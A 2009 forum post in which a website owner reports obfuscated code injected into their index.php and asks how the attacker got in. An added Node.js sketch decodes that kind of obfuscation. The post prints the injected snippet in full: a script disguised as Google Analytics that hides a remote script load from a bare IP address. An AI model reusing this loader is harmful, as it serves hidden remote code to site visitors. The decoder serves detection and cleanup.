06-11-2009, 03:27 PM   #1
cecilia
Inserting into the index

I can't think of how it was done; somehow this code got inserted onto my index.php at the very bottom. I'm thinking because the page to log in to the site is behind a password-protected folder and there's no other textareas or text input boxes anywhere else. Does this mean the attacker somehow got a correct login and password combination?

I don't know why, but all of this started happening since I used Notepad++ to do my stuff; I've always just done it directly from the cPanel. So I'm starting to wonder if my computer got infected with something or... I don't know.

I mean, I'm acknowledging that there might have been an input box or something that I missed behind the login page, but you have to get in past it to access that, right, so...

Thank you all for the input.

javascript Code:
<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='
" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>



EDIT:

I just looked through the entire site; I applied stripslashes, strip_tags and mysql_real_escape_string on all of the user inputs that I missed.

Last edited by codefreek : 06-25-2009 at 04:54 PM. Reason: highlight added.
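Added example, not part of the original post: the injected snippet hides a second `src` attribute by padding it with junk characters and removing them at run time with `.replace()`. The Node.js sketch below undoes that statically so the hidden host can be read and blocked. `SAMPLE` is the expression copied from the post; `findStrippedLiterals` and the `ALLOWED` host list are names and assumptions introduced here.

```javascript
// Added example: statically undo the "junk characters + .replace()" trick.
// SAMPLE is the obfuscated expression from the post, embedded verbatim.
const SAMPLE = String.raw`document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));`;

// Assumption: the only script hosts this page should load (the two GA hosts
// the snippet itself builds from gaJsHost).
const ALLOWED = new Set(["ssl.google-analytics.com", "www.google-analytics.com"]);

// Matches  'literal'.replace(/regex/flags, '')
// Groups: 1 = literal body, 2 = regex body, 3 = regex flags.
const STRIP_CALL =
  /'((?:\\.|[^'\\])*)'\s*\.replace\(\s*\/((?:\\.|[^\/\\\n])+)\/([a-z]*)\s*,\s*(?:''|"")\s*\)/g;

function findStrippedLiterals(source, allowedHosts = ALLOWED) {
  const findings = [];
  for (const [, rawLiteral, pattern, flags] of source.matchAll(STRIP_CALL)) {
    let stripper;
    try {
      stripper = new RegExp(pattern, flags); // the same regex the browser would run
    } catch {
      continue; // not a regex this engine accepts; skip rather than guess
    }
    // Simplified unescape: turns \' into ' (enough for this pattern).
    const literal = rawLiteral.replace(/\\(.)/g, "$1");
    const decoded = literal.replace(stripper, "");
    const hosts = [];
    for (const [url] of decoded.matchAll(/https?:\/\/[^\s'"<>]+/g)) {
      try { hosts.push(new URL(url).hostname); } catch { /* not a parseable URL */ }
    }
    findings.push({
      decoded,
      hosts,
      // Suspicious when the stripped text names a host outside the allowlist.
      suspicious: hosts.some((h) => !allowedHosts.has(h)),
    });
  }
  return findings;
}

console.log(findStrippedLiterals(SAMPLE));
```

Running the same function over every `.php`, `.html` and `.js` file in the web root shows which other files carry the injection.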